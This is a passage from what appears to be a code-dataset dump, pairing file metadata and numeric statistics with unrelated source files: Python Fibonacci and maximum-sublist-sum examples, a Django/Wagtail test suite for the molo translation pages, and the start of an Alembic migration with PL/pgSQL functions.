| 0.056881
| 0.057145
| 0.082037
| 0.109383
| 0.857224
| 0.838074
| 0.812306
| 0.775669
| 0.731978
| 0.677725
| 0
| 0.016939
| 0.173546
| 33,288
| 957
| 108
| 34.783699
| 0.812511
| 0.104362
| 0
| 0.621212
| 0
| 0
| 0.129567
| 0.079631
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00947
| 0
| 0.645833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
b7142b0ef12c6a87be2402c1531270d92aeedce0
| 382
|
py
|
Python
|
00 - Quickly Look/Fibonacci/Fibonacci.py
|
whosramoss/Optimal-Coding-Solutions
|
2b507fab7174fe2d22bc8c153df70753c84ace7e
|
[
"MIT"
] | null | null | null |
00 - Quickly Look/Fibonacci/Fibonacci.py
|
whosramoss/Optimal-Coding-Solutions
|
2b507fab7174fe2d22bc8c153df70753c84ace7e
|
[
"MIT"
] | null | null | null |
00 - Quickly Look/Fibonacci/Fibonacci.py
|
whosramoss/Optimal-Coding-Solutions
|
2b507fab7174fe2d22bc8c153df70753c84ace7e
|
[
"MIT"
] | null | null | null |
# Python
def fib():
    """Yield the Fibonacci numbers 1, 1, 2, 3, 5, ... indefinitely."""
    a, b = 1, 1
    while True:
        yield a
        a, b = b, a + b


# Print the first ten Fibonacci numbers, one per line.
# Bug fix: the original ended the print with a Python-2-style trailing
# comma (`print("%s" % x),`), which under Python 3 just builds and
# discards a (None,) tuple; the comma is removed.
for index, x in enumerate(fib()):
    if index == 10:
        break
    print("%s" % x)
# Python 3
def fib3():
    """Yield the Fibonacci numbers 1, 1, 2, 3, 5, ... indefinitely."""
    a, b = 1, 1
    while True:
        yield a
        a, b = b, a + b


# Print the first ten Fibonacci numbers separated by spaces.
# Bug fix: the loop previously iterated fib() — the generator from the
# preceding Python-2 example — instead of the fib3() defined here, so this
# snippet was not self-contained.
for index, x in enumerate(fib3()):
    if index == 10:
        break
    print("{} ".format(x), end="")
| 16.608696
| 34
| 0.445026
| 60
| 382
| 2.833333
| 0.383333
| 0.070588
| 0.035294
| 0.047059
| 0.776471
| 0.776471
| 0.776471
| 0.776471
| 0.776471
| 0.776471
| 0
| 0.043103
| 0.39267
| 382
| 23
| 34
| 16.608696
| 0.689655
| 0.041885
| 0
| 0.777778
| 0
| 0
| 0.013736
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| true
| 0
| 0
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b717485402b95034de64a33d52aecf589fb708cc
| 890
|
py
|
Python
|
correct_python_programs/max_sublist_sum.py
|
PatrickShaw/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 22
|
2018-01-29T01:56:30.000Z
|
2022-03-21T12:25:40.000Z
|
correct_python_programs/max_sublist_sum.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 31
|
2017-12-18T21:04:34.000Z
|
2022-02-21T07:38:09.000Z
|
correct_python_programs/max_sublist_sum.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 19
|
2018-01-06T14:18:33.000Z
|
2022-03-21T12:25:43.000Z
|
def max_sublist_sum(arr):
    """Return the largest sum over all contiguous sublists of arr.

    The empty sublist (sum 0) is always a candidate, so the result is
    never negative. Runs in O(n) time (Kadane's algorithm).
    """
    best = 0
    running = 0
    for value in arr:
        # Extend the current run, abandoning it once it dips below zero.
        running += value
        if running < 0:
            running = 0
        if running > best:
            best = running
    return best
"""
def max_sublist_sum(arr):
max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(max_ending_here + x, 0)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
def max_sublist_sum(arr):
max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(x, max_ending_here + x)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
def max_sublist_sum(arr):
max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(max_ending_here + x, x)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
"""
| 19.777778
| 53
| 0.65618
| 160
| 890
| 3.2
| 0.0875
| 0.28125
| 0.40625
| 0.25
| 0.994141
| 0.994141
| 0.994141
| 0.994141
| 0.994141
| 0.994141
| 0
| 0.015385
| 0.269663
| 890
| 44
| 54
| 20.227273
| 0.772308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b7189591fccb4b1fa9bd355ffb96080ca2aa362a
| 29,331
|
py
|
Python
|
molo/core/tests/test_translations.py
|
praekelt/molo
|
a46e6e63e5ae9525f077f3d548cc0b492f884b97
|
[
"BSD-2-Clause"
] | 25
|
2015-09-26T13:45:30.000Z
|
2018-09-13T14:12:20.000Z
|
molo/core/tests/test_translations.py
|
praekelt/molo
|
a46e6e63e5ae9525f077f3d548cc0b492f884b97
|
[
"BSD-2-Clause"
] | 510
|
2015-05-29T09:30:44.000Z
|
2018-12-11T09:08:11.000Z
|
molo/core/tests/test_translations.py
|
praekeltfoundation/molo
|
a46e6e63e5ae9525f077f3d548cc0b492f884b97
|
[
"BSD-2-Clause"
] | 5
|
2020-03-26T19:30:13.000Z
|
2020-09-04T16:35:59.000Z
|
import pytest
from django.utils import timezone
from django.urls import reverse
from django.core.cache import cache
from django.test import TestCase, RequestFactory
from django.shortcuts import get_object_or_404
from django.db.models.query import QuerySet
from wagtail.core.models import Site
from molo.core.tests.base import MoloTestCaseMixin
from molo.core.models import SectionPage, SiteSettings, \
ArticlePage, Main, SiteLanguageRelation, Languages, ArticlePageTags
from molo.core.tasks import promote_articles
from molo.core.wagtail_hooks import show_main_language_only
from wagtail.core.models import Page
@pytest.mark.django_db
class TestTranslations(TestCase, MoloTestCaseMixin):
    def setUp(self):
        """Build a main site with three locales, two sections, and log in.

        English is the main language; French and Mexican Spanish are
        translation languages exercised throughout these tests.
        """
        cache.clear()
        self.mk_main()
        self.factory = RequestFactory()
        main = Main.objects.all().first()
        self.english = SiteLanguageRelation.objects.create(
            language_setting=Languages.for_site(main.get_site()),
            locale='en',
            is_active=True)
        self.french = SiteLanguageRelation.objects.create(
            language_setting=Languages.for_site(main.get_site()),
            locale='fr',
            is_active=True)
        self.spanish_mexico = SiteLanguageRelation.objects.create(
            language_setting=Languages.for_site(main.get_site()),
            locale='es-mx',
            is_active=True)
        # Creates a section under the main page
        self.english_section = self.mk_section(
            self.section_index, title='English section')
        # Creates a sub-section under the section
        self.english_subsection = self.mk_section(
            self.english_section, title='English subsection')
        # Login
        self.user = self.login()
        self.site = main.get_site()
def test_section_index_page(self):
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(response, 'English section')
def test_wagtail_root_page_has_no_translations(self):
response = self.client.get(reverse(
'wagtailadmin_explore_root'))
self.assertNotContains(response, 'French')
    def test_that_all_translation_languages_are_listed(self):
        """Every translation language is offered, but not the main language."""
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        # Checks main language is not listed as translation language
        self.assertNotContains(response, 'title="English">English')
        # Checks if translation language exists
        self.assertContains(response, 'title="French">French')
        self.assertContains(response,
                            'title="Mexican Spanish">Mexican Spanish')
    def test_that_only_main_language_pages_are_listed(self):
        """The explore listing hides translation pages of listed sections."""
        self.client.post(reverse(
            'add_translation', args=[self.english_section.id, 'fr']))
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        # checks that only the english section is listed
        # and not the french section
        self.assertContains(response, 'English section')
        self.assertNotContains(response,
                               'French translation of English section')
    def test_that_only_main_language_pages_returns_list(self):
        """show_main_language_only filters a list input down to main-language pages."""
        self.client.post(reverse(
            'add_translation', args=[self.english_section.id, 'fr']))
        request = self.factory.get(
            "http://main-1.localhost:8000/admin/pages/"
            + str(self.english_section.id) + "/")
        # The wagtail hook reads the site off the request directly.
        request._wagtail_site = self.site
        parent_page = get_object_or_404(Page, id=self.section_index.id)
        pages = list(parent_page.get_children().prefetch_related(
            'content_type', 'sites_rooted_here'))
        pages = show_main_language_only(
            parent_page,
            pages,
            request,
        )
        # checks that only the english section is listed
        # and not the french section
        assert isinstance(pages, list)
        assert len(pages) == 1
        self.assertEqual(pages[0].title, 'English section')
    def test_that_only_main_language_pages_returns_queryset(self):
        """show_main_language_only keeps a QuerySet input as a QuerySet."""
        self.client.post(reverse(
            'add_translation', args=[self.english_section.id, 'fr']))
        request = self.factory.get(
            "http://main-1.localhost:8000/admin/pages/"
            + str(self.english_section.id) + "/")
        # The wagtail hook reads the site off the request directly.
        request._wagtail_site = self.site
        parent_page = get_object_or_404(Page, id=self.section_index.id)
        pages = parent_page.get_children().prefetch_related(
            'content_type', 'sites_rooted_here')
        pages = show_main_language_only(
            parent_page,
            pages,
            request,
        )
        # check a queryset is returned
        # checks that only the english section is in the queryset
        # and not the french section
        assert isinstance(pages, QuerySet)
        assert len(pages) == 1
        self.assertEqual(pages[0].title, 'English section')
def test_page_doesnt_have_translation_action_button_links_to_addview(self):
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(response,
'<a href="/admin/translations/add/%s/fr/"'
% self.english_section.id)
def test_that_translation_have_the_right_language(self):
self.client.get(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
page = SectionPage.objects.get(
title='French translation of English section')
self.assertEqual(str(page.language.locale), 'fr')
    def test_draft_translations_have_additional_css_clsss(self):
        """The translation button's CSS reflects the page's draft/live state.

        A draft (or draft-over-live) translation adds the
        ``translation-translated-draft`` class; a cleanly published one
        drops it.
        """
        self.client.post(reverse(
            'add_translation', args=[self.english_section.id, 'fr']))
        page = SectionPage.objects.get(
            slug='french-translation-of-english-section')
        # Checks when the translated page is draft
        # the translation button has the right css
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        self.assertContains(
            response, 'class="button button-small button-secondary '
            'translation-translated translation-translated-draft" '
            'title="French">French</a>')
        # Checks when the translated page is Draft + live
        # the translation button has the right css
        page.save_revision().publish()
        page.save_revision()
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        self.assertContains(
            response, 'class="button button-small button-secondary '
            'translation-translated translation-translated-draft" '
            'title="French">French</a>')
        # Checks when the translated page is Published
        # the translation button has the right css
        page.save_revision().publish()
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        self.assertContains(
            response, 'class="button button-small button-secondary '
            'translation-translated " title="French">French</a>')
def test_if_page_has_a_translation_the_action_links_to_the_edit_page(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
page = SectionPage.objects.get(
slug='french-translation-of-english-section')
self.assertContains(response,
'<a href="/admin/pages/%s/edit/"'
% page.id)
    def test_republishing_main_section_effecting_translated_section(self):
        """Unpublishing the main section leaves the translation button published.

        The translation keeps its "translated" (non-draft) CSS class both
        before and after the English section is unpublished.
        """
        self.client.post(reverse(
            'add_translation', args=[self.english_section.id, 'fr']))
        page = SectionPage.objects.get(
            slug='french-translation-of-english-section')
        page.save_revision().publish()
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        self.assertContains(
            response, 'class="button button-small button-secondary '
            'translation-translated " title="French">French</a>')
        self.client.post(reverse(
            'wagtailadmin_pages:unpublish', args=[self.english_section.id]))
        # Refresh the section from the DB after unpublishing.
        self.english_section = SectionPage.objects.get(
            id=self.english_section.id)
        response = self.client.get(reverse(
            'wagtailadmin_explore', args=[self.section_index.id]))
        self.assertContains(
            response, 'class="button button-small button-secondary '
            'translation-translated " title="French">French</a>')
def test_adding_translation_that_already_exists_redirects_to_edit(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
response = self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
page = SectionPage.objects.get(
slug='french-translation-of-english-section')
self.assertRedirects(
response, reverse('wagtailadmin_pages:edit', args=[page.id]))
def test_adding_translation_to_non_translatable_page_redirects_home(self):
response = self.client.post(reverse(
'add_translation', args=[self.section_index.id, 'fr']))
self.assertRedirects(response, reverse('wagtailadmin_home'))
def test_site_languages_summary(self):
articles = self.mk_articles(
parent=self.english_section, count=2)
for article in articles:
self.client.post(reverse(
'add_translation', args=[article.id, 'fr']))
response = self.client.get(reverse('wagtailadmin_home'))
self.assertContains(response, '<span>2</span>English Pages')
self.assertContains(response, '<span>2</span>French Pages')
    def test_site_exists_if_no_iems_translated_for_translated_only(self):
        """The site still renders when nothing is translated.

        With show_only_translated_pages enabled and tag navigation on,
        the home page must return 200 both in the main language and after
        switching to a locale with no translated content.
        """
        site_settings = SiteSettings.for_site(self.main.get_site())
        site_settings.enable_tag_navigation = True
        site_settings.show_only_translated_pages = True
        site_settings.save()
        tag = self.mk_tag(parent=self.tag_index)
        tag.feature_in_homepage = True
        tag.save_revision().publish()
        articles = self.mk_articles(
            parent=self.english_section,
            featured_in_latest_start_date=timezone.now(),
            featured_in_homepage_start_date=timezone.now(), count=30)
        for article in articles:
            ArticlePageTags.objects.create(page=article, tag=tag)
        promote_articles()
        response = self.client.get('/')
        self.assertEqual(response.status_code, 200)
        # Switch to French (no translations exist) and re-check the home page.
        response = self.client.get('/locale/fr/')
        response = self.client.get('/')
        self.assertEqual(response.status_code, 200)
    def test_that_only_translated_sections_show_with_tag_navigation(self):
        """With tag navigation on, only translated sections appear in French."""
        site_settings = SiteSettings.for_site(self.main.get_site())
        site_settings.enable_tag_navigation = True
        site_settings.show_only_translated_pages = True
        site_settings.save()
        response = self.client.get('/locale/fr/')
        response = self.client.get('/')
        self.mk_section_translation(
            self.english_section, self.french,
            title=self.english_section.title + ' in french')
        article1 = self.mk_article(
            self.english_section,
            title='English article1 in English Section',
            featured_in_homepage_start_date=timezone.now(),
            featured_in_homepage=True)
        self.mk_article_translation(
            article1, self.french, title=article1.title + ' in french',)
        promote_articles()
        # In English the section shows under its original title.
        response = self.client.get('/')
        self.assertContains(response, 'English section')
        # After switching locale, the French translation is linked instead.
        response = self.client.get('/locale/fr/')
        response = self.client.get('/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section-in-french/"'
            ' class="section-listing__theme-bg-link">'
            'English section in french</a>')
    def test_that_only_translated_pages_are_shown_on_front_end(self):
        """With show_only_translated_pages on, untranslated pages are hidden.

        Verifies the home page section listing, a section's article
        listing, and the latest-articles block: in the French locale only
        translated sections/articles appear; in English everything does.
        """
        # set the site settings show_only_translated_pages to True
        default_site = Site.objects.get(is_default_site=True)
        setting = SiteSettings.objects.create(site=default_site)
        setting.show_only_translated_pages = True
        setting.save()
        eng_section2 = self.mk_section(
            self.section_index, title='English section2')
        self.mk_section_translation(
            eng_section2, self.french,
            title=eng_section2.title + ' in french')
        article1 = self.mk_article(
            eng_section2,
            title='English article1 in section 2',
            featured_in_latest_start_date=timezone.now(),
            featured_in_homepage_start_date=timezone.now())
        self.mk_article_translation(
            article1, self.french, title=article1.title + ' in french',)
        article2 = self.mk_article(
            self.english_section,
            title='English article2 in section 1',
            featured_in_latest_start_date=timezone.now(),
            featured_in_homepage_start_date=timezone.now())
        self.mk_article_translation(
            article2, self.french, title=article2.title + ' in french',)
        promote_articles()
        # tests that in Home page users will only see the sections
        # that have been translated
        response = self.client.get('/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/"'
            ' class="section-listing__theme-bg-link">English section</a>')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section2/"'
            ' class="section-listing__theme-bg-link">English section2</a>')
        response = self.client.get('/locale/fr/')
        response = self.client.get('/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section2-in-french/"'
            ' class="section-listing__theme-bg-link">'
            'English section2 in french</a>')
        self.assertNotContains(
            response,
            '<a href="/sections-main-1/english-section/"'
            ' class="section-listing__theme-bg-link">English section</a>')
        en_page = self.mk_article(self.english_section,
                                  title='English article1',
                                  featured_in_latest_start_date=timezone.now())
        promote_articles()
        en_page = ArticlePage.objects.get(title=en_page.title)
        self.mk_article_translation(
            en_page, self.french, title=en_page.title + ' in french',)
        self.mk_article(self.english_section,
                        title='English article2',
                        featured_in_latest_start_date=timezone.now())
        promote_articles()
        # tests that in english section users will only see the articles
        # that have been translated
        response = self.client.get('/locale/en/')
        response = self.client.get('/sections-main-1/english-section/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/english-article1-3/" '
            'class="promoted-article-list__anchor">'
            '<h3 class="heading promoted-article__title">'
            'English article1'
            '</h3></a>', html=True)
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/english-article2-2/" '
            'class="promoted-article-list__anchor">'
            '<h3 class="heading promoted-article__title">'
            'English article2'
            '</h3></a>', html=True)
        response = self.client.get('/locale/fr/')
        response = self.client.get('/sections-main-1/english-section/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/'
            'english-article1-in-french/" '
            'class="promoted-article-list__anchor">'
            '<h3 class="heading promoted-article__title">'
            'English article1 in french'
            '</h3></a>', html=True)
        self.assertNotContains(
            response,
            '<a href="/sections-main-1/english-section/english-article2-2/" '
            'class="promoted-article-list__anchor">'
            '<h3 class="heading promoted-article__title">'
            'English article2'
            '</h3></a>', html=True)
        # tests that in latest block users will only see the articles
        # that have been translated
        response = self.client.get('/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/'
            'english-article1-in-french/" '
            'class="promoted-article-list__anchor'
            ' promoted-article-list__anchor--theme-headings">'
            '<h5 class="heading'
            ' promoted-article__title--theme-headings">'
            'English article1 in french'
            '</h5></a>', html=True)
        self.assertNotContains(
            response,
            '<a href="/sections-main-1/english-section/'
            'english-article1-3/" '
            'class="promoted-article-list__anchor'
            ' promoted-article-list__anchor--theme-headings">'
            '<h5 class="heading'
            ' promoted-article__title--theme-headings">'
            'English article1'
            '</h5></a>', html=True)
        response = self.client.get('/locale/en/')
        response = self.client.get('/')
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/english-article1-3/"'
            ' class="promoted-article-list__anchor'
            ' promoted-article-list__anchor--theme-headings">'
            '<h5 class="heading'
            ' promoted-article__title--theme-headings">English article1</h5>'
            '</a>', html=True)
        self.assertContains(
            response,
            '<a href="/sections-main-1/english-section/english-article2-2/"'
            ' class="promoted-article-list__anchor'
            ' promoted-article-list__anchor--theme-headings">'
            '<h5 class="heading'
            ' promoted-article__title--theme-headings">English article2</h5>'
            '</a>', html=True)
def test_that_only_live_pages_show_with_only_translated_setting_off(self):
"""With SiteSettings.show_only_translated_pages disabled, a child
locale falls back to the live main-language article when no
translation exists, and articles that are live in neither language
are hidden entirely."""
# set the site settings show_only_translated_pages to False
default_site = Site.objects.get(is_default_site=True)
setting = SiteSettings.objects.create(site=default_site)
setting.show_only_translated_pages = False
setting.save()
self.mk_section_translation(
self.english_section, self.french,
title=self.english_section.title + ' in french')
# article1 gets a French translation; article2 stays English-only
article1 = self.mk_article(
self.english_section,
title='English article1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
self.mk_article_translation(
article1, self.french, title=article1.title + ' in french',)
article2 = self.mk_article(
self.english_section,
title='English article2',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
# tests that users will see the main language article for
# pages that haven't been translated
response = self.client.get('/locale/fr/', follow=True)
response = self.client.get('/sections-main-1/english-section/',
follow=True)
self.assertContains(
response, 'English article1 in french', html=True)
self.assertContains(
response, 'English article2', html=True)
self.assertNotContains(
response, 'English article2 in french', html=True)
# tests that users won't see the main language page if it isn't live
article2.unpublish()
response = self.client.get('/sections-main-1/english-section/',
follow=True)
self.assertContains(
response, 'English article1 in french', html=True)
self.assertNotContains(
response, 'English article2', html=True)
self.assertNotContains(
response, 'English article2 in french', html=True)
# tests that users won't see the main language page if both it and the
# the translation are not live
fr_article = self.mk_article_translation(
article2, self.french, title=article2.title + ' in french',)
fr_article.unpublish()
response = self.client.get('/sections-main-1/english-section/',
follow=True)
self.assertContains(
response, 'English article1 in french', html=True)
self.assertNotContains(
response, 'English article2', html=True)
self.assertNotContains(
response, 'English article2 in french', html=True)
def test_if_main_lang_page_unpublished_translated_page_still_shows(self):
"""An unpublished main-language page is hidden in the main locale,
but its published translation is still served in the child locale.

Fixture setup: section2 and article2 are unpublished in English but
both have French translations; article1 is published with a French
translation."""
eng_section2 = self.mk_section(
self.section_index, title='English section2')
self.mk_section_translation(
eng_section2, self.french,
title=eng_section2.title + ' in french')
eng_section2.unpublish()
self.mk_article(
eng_section2,
title='English article1 in section 2',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
en_page = self.mk_article(
self.english_section,
title='English article1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
promote_articles()
self.mk_article_translation(
en_page, self.french, title=en_page.title + ' in french',)
en_page2 = self.mk_article(
self.english_section,
title='English article2',
featured_in_latest_start_date=timezone.now())
promote_articles()
# re-fetch: promote_articles() mutates the stored page
en_page2 = ArticlePage.objects.get(title=en_page2.title)
self.mk_article_translation(
en_page2, self.french, title=en_page2.title + ' in french',)
en_page2.unpublish()
# tests that on home page users will only
# see the pages that are published
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/"'
' class="section-listing__theme-bg-link">English section</a>')
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section2/"'
' class="section-listing__theme-bg-link">English section2</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article1-3/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading '
'promoted-article-list__heading">'
' English article1</h3></a>',
html=True)
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/english-article2-3/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
' English article2</h3></a>',
html=True)
response = self.client.get('/sections-main-1/english-section/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article1-3/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article1</h3></a>', html=True)
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/english-article2/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article2</h3></a>', html=True)
# tests that when switching to a child language
# users will see all the published translated pages
# even if the main language page is unpublished
response = self.client.get('/locale/fr/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/"'
' class="section-listing__theme-bg-link">English section</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2-in-french/"'
' class="section-listing__theme-bg-link">'
'English section2 in french</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-in-french/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1 in french</h3>', html=True)
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/'
'english-article1-in-section-2/" '
'class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1 in section 2</h3></a>',
html=True)
response = self.client.get('/sections-main-1/english-section/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-in-french/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading'
' promoted-article__title">English article1 in french</h3></a>',
html=True)
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article2-in-french/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading'
' promoted-article__title">English article2 in french</h3></a>',
html=True)
def test_if_mexican_spanish_translated_pages_are_shown_on_front_end(self):
"""A locale with a region code (es-mx) serves its translated section
and article titles, while the default locale keeps showing only the
main-language versions."""
en_section2 = self.mk_section(
self.section_index, title='English section2')
self.mk_section_translation(
en_section2, self.spanish_mexico,
title=en_section2.title + ' in Mexican Spanish')
en_page = self.mk_article(
en_section2,
title='English article1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
promote_articles()
# re-fetch: promote_articles() mutates the stored page
en_page = ArticlePage.objects.get(pk=en_page.pk)
self.mk_article_translation(
en_page, self.spanish_mexico,
title=en_page.title + ' in Mexican Spanish',)
# default locale: only the main-language titles appear
response = self.client.get('/')
self.assertContains(
response,
'English section2')
self.assertNotContains(
response,
'English section2 in Mexican Spanish')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/english-article1/" '
'class="promoted-article-list__anchor '
'promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1</h3></a>', html=True)
self.assertNotContains(
response,
'English article1 in Mexican Spanish')
# after switching to es-mx the translated titles appear
response = self.client.get('/locale/es-mx/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2-in-mexican-spanish/"'
' class="section-listing__theme-bg-link">'
'English section2 in Mexican Spanish</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/'
'english-article1-in-mexican-spanish/"'
' class="promoted-article-list__anchor '
'promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1 in Mexican Spanish</h3></a>', html=True)
| 42.694323
| 79
| 0.61822
| 3,201
| 29,331
| 5.471728
| 0.074664
| 0.063945
| 0.045218
| 0.050357
| 0.829061
| 0.790294
| 0.778019
| 0.75284
| 0.725607
| 0.717442
| 0
| 0.010682
| 0.269135
| 29,331
| 686
| 80
| 42.75656
| 0.806363
| 0.052436
| 0
| 0.7487
| 0
| 0
| 0.276373
| 0.164109
| 0
| 0
| 0
| 0
| 0.117851
| 1
| 0.036395
| false
| 0
| 0.02253
| 0
| 0.060659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f9e915f91a991447a07a5e623669113d67db160
| 21,254
|
py
|
Python
|
alembic/versions/eb70cc55b178_entry_group_optimization.py
|
SegFaulti4/lingvodoc
|
8b296b43453a46b814d3cd381f94382ebcb9c6a6
|
[
"Apache-2.0"
] | 5
|
2017-03-30T18:02:11.000Z
|
2021-07-20T16:02:34.000Z
|
alembic/versions/eb70cc55b178_entry_group_optimization.py
|
SegFaulti4/lingvodoc
|
8b296b43453a46b814d3cd381f94382ebcb9c6a6
|
[
"Apache-2.0"
] | 15
|
2016-02-24T13:16:59.000Z
|
2021-09-03T11:47:15.000Z
|
alembic/versions/eb70cc55b178_entry_group_optimization.py
|
Winking-maniac/lingvodoc
|
f037bf0e91ccdf020469037220a43e63849aa24a
|
[
"Apache-2.0"
] | 22
|
2015-09-25T07:13:40.000Z
|
2021-08-04T18:08:26.000Z
|
"""Entry group optimization
Revision ID: eb70cc55b178
Revises: 2b852140e36e
Create Date: 2019-11-05 09:40:55.615947
"""
# revision identifiers, used by Alembic.
revision = 'eb70cc55b178'
down_revision = '2b852140e36e'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
"""Install PL/pgSQL helpers and a materialized view that speed up
gathering groups of etymologically linked lexical entries.

Each op.execute() below creates one database object; the SQL bodies
carry their own inline documentation. The helpers communicate through
session-local temporary tables (entry_id_table, tag_table, tag_list_a,
tag_list_b) that are created ON COMMIT DROP by the linked_group
entry points."""
# linked_cycle(field_id, field_id, publish, accept): tag-closure loop
# over the temp tables, with publishing/acceptance filtering.
op.execute('''
/* Gathers lexical entries linked through a specified link field. */
create or replace function
linked_cycle(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns void as $$
begin
-- Gathering all entries until no unprocessed tags are left.
while exists (
select 1 from tag_list_a) loop
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E,
publishingentity P
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_a) and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
